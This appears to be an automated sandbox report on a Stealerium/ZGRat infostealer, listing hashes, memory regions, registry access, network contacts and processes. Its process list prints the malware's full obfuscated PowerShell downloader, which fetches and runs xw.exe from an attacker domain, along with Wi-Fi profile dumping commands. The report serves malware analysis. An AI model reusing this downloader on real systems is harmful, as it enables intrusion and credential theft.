memory/4824-8-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-10-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-6-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-14-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-16-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-18-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-20-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-24-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-26-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-28-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-30-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-22-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-32-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-34-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-38-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-40-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-36-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-42-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-44-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-46-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-50-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-52-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-56-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-54-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-58-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-60-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-62-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-64-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-48-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-68-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-66-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-12-0x0000000006E90000-0x0000000007095000-memory.dmp
memory/4824-937-0x0000000002DE0000-0x0000000002DE1000-memory.dmp
memory/4824-939-0x0000000007320000-0x000000000736C000-memory.dmp
memory/4824-938-0x0000000007430000-0x00000000075D2000-memory.dmp
memory/4824-940-0x0000000007C00000-0x00000000081A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\building.exe.log
| MD5 | c3941d9fa38f1717d5cecd7a2ca71667 |
| SHA1 | 33b5362675383b58b4166ed9f9a61e5aa6768d2e |
| SHA256 | f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256 |
| SHA512 | 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45 |
memory/4824-947-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1540-946-0x00000000056D0000-0x0000000005736000-memory.dmp
memory/1540-945-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1540-944-0x0000000000400000-0x0000000000592000-memory.dmp
memory/1540-948-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-953-0x0000000006000000-0x0000000006008000-memory.dmp
memory/1540-952-0x0000000005FD0000-0x0000000005FF6000-memory.dmp
memory/1540-951-0x0000000005F40000-0x0000000005FD2000-memory.dmp
memory/1540-955-0x0000000006E30000-0x0000000006E38000-memory.dmp
memory/1540-956-0x0000000006E50000-0x0000000006E6E000-memory.dmp
memory/1540-954-0x0000000006E20000-0x0000000006E2A000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/1540-1012-0x0000000006F30000-0x0000000006FC2000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Process.txt
| MD5 | bf20b12d771f890a397436385c1bece5 |
| SHA1 | a4591d040c4a3cabf4d6273179cf498db097a3fd |
| SHA256 | 837fd30d574b109158bcba06387dbfad22c330f7742bb29c8f5c2e19d8f76e53 |
| SHA512 | 0e490228e2982e1e61384288a98d8c66535374b40601400e8e5a9c0c26421d2bf61de7e432b838be032cbb04b478fce39270275bdff7c48a9e2fc4a64871f9b8 |
memory/1540-1113-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-1111-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-1147-0x0000000007080000-0x00000000070FA000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt
| MD5 | b1d58554f33c991f9454f81bf1f6a7a6 |
| SHA1 | 1a9c0748fbb4c4974315f6a3188ffb5078372de1 |
| SHA256 | 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c |
| SHA512 | ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6 |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt
| MD5 | 027a2c6780dfc5777707fc9fe796f5d6 |
| SHA1 | 3add6e59894483c20d09b4dd8623fa42a252495e |
| SHA256 | a19c1057e41ab8a3bc591f4d3ca2fb0a58f9fd34a300084580e14aa214fb3dc1 |
| SHA512 | fcede40cc3f6181b0c59849e966cf03324f305d6b38c05c21c8dacd5ac73a96178654871d39b903f0ffed6ae88ed5a9097a87e8d42544c621609c8767db245c4 |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Apps.txt
| MD5 | 906c700315ca80c7952b464f3f93723f |
| SHA1 | a736b7cdea92db2e686737c4567b86c22ef66e3f |
| SHA256 | c55a28b0b4773dad67a0ea894c080d2398a0e686f1c355cedb7f7291637476e5 |
| SHA512 | af133b667e92cdab4e352b4c86ea7e8986ea9de5e25e61da92a61abe59adb11435d1e44d7e54974c2969c046db1fe1b411186b1578c147829cbb2d5693ffe35c |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
memory/1540-1220-0x0000000007240000-0x00000000072F2000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\System\Debug.txt
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\Admin@FMAEQIOU_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
memory/1540-1222-0x00000000071D0000-0x00000000071F2000-memory.dmp
memory/1540-1223-0x0000000008930000-0x0000000008C84000-memory.dmp
memory/1540-1225-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/1540-1226-0x00000000057C0000-0x00000000057D0000-memory.dmp
C:\Users\Admin\AppData\Local\71d7319007f790734acd1eb67caa82ba\msgid.dat
| MD5 | 13272090fc49070d4c79f78670b7839b |
| SHA1 | 4ea6e614dd113ed7bb5e291537ceed50154f5042 |
| SHA256 | bc91f49e63aa1e5f230c79de3f60aeae2b561531e263e0799efe03b3bb407c84 |
| SHA512 | 27ffb2c8e2a1af82b4ca472eb1a17221ef73f957a79403cf575c749f82aadc57766191076f2da4eee02d4db5785f0d9180294fc3c32a4f98d5fa91549c1e5d4a |
memory/1540-1237-0x0000000007AF0000-0x0000000007AFA000-memory.dmp
memory/1540-1238-0x00000000057C0000-0x00000000057D0000-memory.dmp
memory/1540-1239-0x00000000057C0000-0x00000000057D0000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
150s
Max time network
153s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealerium
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Windows Update.exe | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1012 set thread context of 3080 | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | C:\Users\Admin\AppData\Roaming\xw.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\xw.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\loaderX.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-983843758-932321429-1636175382-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\build.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QTkshkQ($cDGZfk, $yzmbgckKGbazEIn){[IO.File]::WriteAllBytes($cDGZfk, $yzmbgckKGbazEIn)};function TkuLTlapXaFtTtwV($cDGZfk){if($cDGZfk.EndsWith((iyCVHkkuB @(46364,46418,46426,46426))) -eq $True){rundll32.exe $cDGZfk }elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46430,46433,46367))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $cDGZfk}elseif($cDGZfk.EndsWith((iyCVHkkuB @(46364,46427,46433,46423))) -eq $True){misexec /qn /i $cDGZfk}else{Start-Process $cDGZfk}};function DTKsKtcccITMNLzYJ($OBbjRQJFrABngjzzKQR){$QxNgcQqldJUnDwxVjTSlD = New-Object (iyCVHkkuB @(46396,46419,46434,46364,46405,46419,46416,46385,46426,46423,46419,46428,46434));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$yzmbgckKGbazEIn = $QxNgcQqldJUnDwxVjTSlD.DownloadData($OBbjRQJFrABngjzzKQR);return $yzmbgckKGbazEIn};function iyCVHkkuB($BmSsapwYTMD){$uhHMB=46318;$UzSaffw=$Null;foreach($WNyqiOQgreOPKu in $BmSsapwYTMD){$UzSaffw+=[char]($WNyqiOQgreOPKu-$uhHMB)};return $UzSaffw};function nBauMKwRs(){$WplUOTzLXWqwfc = $env:AppData + '\';$flgGVgp = $WplUOTzLXWqwfc + 'xw.exe'; if (Test-Path -Path $flgGVgp){TkuLTlapXaFtTtwV $flgGVgp;}Else{ $hkhkBA = DTKsKtcccITMNLzYJ (iyCVHkkuB @(46422,46434,46434,46430,46433,46376,46365,46365,46427,46415,46421,46423,46417,46364,46430,46429,46423,46433,46429,46428,46434,46429,46429,46426,46440,46364,46417,46429,46427,46365,46438,46437,46364,46419,46438,46419));QTkshkQ $flgGVgp $hkhkBA;TkuLTlapXaFtTtwV $flgGVgp;};;;;}nBauMKwRs;
C:\Users\Admin\AppData\Roaming\xw.exe
"C:\Users\Admin\AppData\Roaming\xw.exe"
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Roaming\xw.exe
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
"C:\Users\Admin\AppData\Local\Temp\loaderX.exe"
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 208.95.112.1:80 | | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 13.95.31.18:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.114.59.183:443 | | tcp |
| N/A | 20.114.59.183:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.77.160.28:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 162.159.134.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.114.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| US | 152.199.19.74:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| GB | 96.16.110.114:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 20.231.121.79:80 | | tcp |
| N/A | 104.18.114.97:80 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 151.80.29.83:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| N/A | 31.14.70.246:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | | udp |
| N/A | 104.18.114.97:80 | | tcp |
| N/A | 162.159.134.233:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 10.73.50.20.in-addr.arpa | udp |
Files
memory/4284-1-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/4284-2-0x0000000002BE0000-0x0000000002BF0000-memory.dmp
memory/4284-3-0x0000000002BE0000-0x0000000002BF0000-memory.dmp
memory/4284-0-0x0000000002B70000-0x0000000002BA6000-memory.dmp
memory/4284-4-0x0000000005840000-0x0000000005E68000-memory.dmp
memory/4284-5-0x00000000055F0000-0x0000000005612000-memory.dmp
memory/4284-6-0x0000000005790000-0x00000000057F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scy4e343.033.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4284-7-0x0000000005E70000-0x0000000005ED6000-memory.dmp
memory/4284-17-0x0000000005FE0000-0x0000000006334000-memory.dmp
memory/4284-18-0x00000000064B0000-0x00000000064CE000-memory.dmp
memory/4284-19-0x00000000064F0000-0x000000000653C000-memory.dmp
memory/4284-20-0x0000000002BE0000-0x0000000002BF0000-memory.dmp
memory/4284-22-0x00000000069E0000-0x00000000069FA000-memory.dmp
memory/4284-23-0x0000000006A50000-0x0000000006A72000-memory.dmp
memory/4284-24-0x0000000007CC0000-0x0000000008264000-memory.dmp
memory/4284-21-0x0000000007670000-0x0000000007706000-memory.dmp
memory/4284-25-0x00000000088F0000-0x0000000008F6A000-memory.dmp
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | eef7a52c4e6fc20cd22306b007b9b4c0 |
| SHA1 | 700f935a3e75a0001654fae0b4d30af5044329c0 |
| SHA256 | 1e5f96939d4d1af801f771de3da5e285c0c7dc4b376dfc127b7320926d0e0444 |
| SHA512 | 4459e6f019a906c13bd41dc3664e0dc4567b8cd941712ecd79e3888fadce517ac640767f80d92fbc57963da5b8e648e1f6a6ec13efe1f37f3bc21b672ac70c70 |
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | e6ccb03a4cd3aa39359361eae696ab9b |
| SHA1 | ac58548d25dee7cc1c6f6b6eff1d53fabfc0aab3 |
| SHA256 | 7cc9da41083cd2640ef63e8190fa4d426e9d03a930348d3dbbcb4074f39e91ba |
| SHA512 | 4e4ee151f1104cc1511b02d8140287b0c489bd21f1491f7b9f0229a31091572e211bcee98f3ec0dc29d8bb0169327b7063ad1a376918548f51aba32931b138cd |
memory/1012-37-0x0000000000A90000-0x0000000000A9E000-memory.dmp
memory/4284-42-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/1012-41-0x00000000053F0000-0x0000000005400000-memory.dmp
memory/1012-40-0x00000000714D0000-0x0000000071C80000-memory.dmp
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | 041d958d503620fcee33aab200c8e17a |
| SHA1 | 6e6b21612723294622356d6897968faa05439b81 |
| SHA256 | 1f84a7ebd0887401a73b3152d38b4ac6dd5b5203189744a645ca59c3e3f4dbfb |
| SHA512 | f6ce0c7d592b5dd8c47fc5eded575be3ac74bb5ad874dfef8091fdbbf957487a0e74be68f229dd2849ec82b7479ec539043cea05687525af0849cbd879dce181 |
memory/1012-43-0x0000000008140000-0x00000000086A8000-memory.dmp
memory/1012-44-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-45-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-47-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-49-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-51-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-53-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-55-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-57-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-59-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-61-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-65-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-63-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-67-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-69-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-71-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-73-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-75-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-77-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-79-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-81-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-83-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-85-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-87-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-89-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-91-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-93-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-95-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-97-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-99-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-101-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-103-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-105-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-107-0x0000000008140000-0x00000000086A3000-memory.dmp
memory/1012-976-0x0000000004D80000-0x0000000004D81000-memory.dmp
memory/1012-977-0x00000000089F0000-0x0000000008EF0000-memory.dmp
memory/1012-978-0x0000000006D00000-0x0000000006D4C000-memory.dmp
C:\Users\Admin\AppData\Roaming\xw.exe
| MD5 | 9b5571670ab852ab22ef3810cfd70159 |
| SHA1 | 8c7972a29379b57f9e40d8b7af796eb938cf8670 |
| SHA256 | 6e1a3a18373c5b55d3dd1e75c210bb15ede6de748c3b88af5858120144558ab1 |
| SHA512 | 01e593ae4febe272b7f3fc303ba130797e1d36335716627ebd667d8c347302ca17d252f2cda37a6cb15906c12ba8c103e480b8a2ce97290a81cea500bb66a092 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1012-985-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3080-987-0x00000000714D0000-0x0000000071C80000-memory.dmp
memory/3080-986-0x0000000000400000-0x0000000000C0A000-memory.dmp
memory/3080-988-0x0000000005610000-0x00000000056A2000-memory.dmp
memory/3080-990-0x00000000055C0000-0x00000000055CA000-memory.dmp
memory/3080-989-0x0000000005790000-0x00000000057A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\loaderX.exe
| MD5 | f37938f3bb58f159e1d46403c6e0b10a |
| SHA1 | 78948994aa6c388b4356ee1eeb94b20cdfcda845 |
| SHA256 | 634a0173ea818d5b152fcfbd8cc4b5d05fb381dac744b251a7b0184b2d7ddac8 |
| SHA512 | 6345f8f659fbcd16bb9f42cb68270f9ab275a76ba0acc74cb55a1d6c1bfade06c0cf1d2fbd6b671cb0445869714a19bb8d08ac71ca57fdd21a941fe0b28773a5 |
C:\Users\Admin\AppData\Local\Temp\build.exe
| MD5 | a90e4f6bdd44a71e2246160693884539 |
| SHA1 | 940ebec474e0b4d87dc4f06f37a1d32d2315cf56 |
